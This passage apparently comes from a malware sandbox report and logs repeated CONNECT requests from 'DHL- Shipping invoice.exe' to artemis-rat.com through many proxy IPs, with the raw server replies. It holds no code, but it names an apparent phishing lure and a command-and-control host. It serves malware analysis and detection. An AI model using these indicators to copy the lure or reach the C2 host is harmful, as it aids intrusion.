                            2128192.168.2.453466154.65.39.7806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.536524057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.640857935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:18.749353886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:24.749993086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:36.754044056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:37.935590982 CET536INHTTP/1.1 500 Internal Server Error
                            Date: Tue, 12 Mar 2024 04:38:57 GMT
                            Server: Apache/2.4.38 (Debian)
                            Content-Length: 613
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of
                            Mar 12, 2024 08:37:37.935612917 CET269INData Raw: 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f
                            Data Ascii: the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.38 (Debian) Server at artemis-rat.com Port 443


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2129192.168.2.455678115.146.225.137100466484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.536612034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2130192.168.2.455683125.228.143.20741456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.543875933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2131192.168.2.453482103.13.120.11631286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.554174900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.562592983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:18.562565088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:24.571574926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:26.210036993 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2132192.168.2.45366895.216.224.15597926484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.568953037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.562628984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:18.562563896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:24.571613073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:36.749783039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:48.765405893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:00.765407085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:24.859220028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:12.874802113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2133192.168.2.45352892.204.134.38529296484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.568953037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.640723944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:18.749329090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:24.749993086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:36.754050016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:00.765409946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:48.765399933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2134192.168.2.453547162.214.225.223484146484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.572565079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2135192.168.2.455649199.102.104.7041456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.572730064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2136192.168.2.453495181.129.183.19532816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.578989029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.913649082 CET19INHTTP/1.1 200 OK


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2137192.168.2.455615146.19.106.145123346484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.579387903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2138192.168.2.45356693.184.9.910806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.579536915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2139192.168.2.455609111.53.178.24973026484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.590712070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2140192.168.2.453762116.118.98.2656786484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.590950012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2141192.168.2.4538568.134.176.5966666484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.595721006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.929816008 CET767INHTTP/1.1 403 Forbidden
                            Server: Beaver
                            Cache-Control: no-cache
                            Content-Type: text/html
                            Content-Length: 635
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2142192.168.2.455682162.253.68.9741456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.595838070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2143192.168.2.453772102.132.54.3580806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.607280016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2144192.168.2.455645103.97.179.11510806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.610739946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2145192.168.2.454328184.170.249.6541456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.614337921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2146192.168.2.45406254.36.122.16445876484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.614630938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.750050068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:18.750050068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2147192.168.2.454060157.159.10.86806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.614908934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.750050068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:18.750050068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:24.749871016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2148192.168.2.45568031.43.33.5641536484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.642759085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2149192.168.2.454064173.212.237.43180016484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.643165112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.750052929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:18.750058889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:24.749859095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:36.749789953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:48.765409946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2150192.168.2.455633152.32.130.117180806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.643255949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.359314919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2151192.168.2.455675199.58.185.941456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.643306971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
